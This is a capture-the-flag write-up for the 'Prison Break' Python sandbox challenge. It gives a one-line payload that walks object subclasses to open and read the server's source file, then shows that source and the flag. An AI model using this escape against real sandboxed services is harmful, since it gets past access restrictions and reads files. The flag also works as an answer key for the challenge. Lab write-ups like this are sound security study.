CSICTF-Writeups/Miscellaneous/Prison Break/README.md

1.7 KiB

Prison Break

The main idea finding the flag is just escaping Python Sandbox.

Step-1:

After I ran nc chall.csivit.com 30407, we get this a python sandbox.

I tried various commands like flag and ctf and all, but nothing worked.

Step-2:

Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/

Step-3:

There I got this 1 liner to escape the sandbox.

Payload:

print(().__class__.__bases__[0].__subclasses__()[40](__file__).read())

I got the source code, which had the flag.

#!/usr/bin/python

import sys

class Sandbox(object):
    def execute(self, code_string):
        exec(code_string)
        sys.stdout.flush()

sandbox = Sandbox()

_raw_input = raw_input

main = sys.modules["__main__"].__dict__
orig_builtins = main["__builtins__"].__dict__

builtins_whitelist = set((
    #exceptions
    'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception',

    #constants
    'False', 'None', 'True',

    #types
    'basestring', 'bytearray', 'bytes', 'complex', 'dict',

    #functions
    'abs', 'bin', 'dir', 'help'

    # blocked: eval, execfile, exit, file, quit, reload, import, etc.
))

for builtin in orig_builtins.keys():
    if builtin not in builtins_whitelist:
        del orig_builtins[builtin]

print("Find the flag.")
sys.stdout.flush()

def flag_function():
    flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}"

while 1:
    try:
        sys.stdout.write(">>> ")
        sys.stdout.flush()
        code = _raw_input()
        sandbox.execute(code)

    except Exception:
        print("You have encountered an error.")
        sys.stdout.flush()

Step-4:

Finally the flag becomes: csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}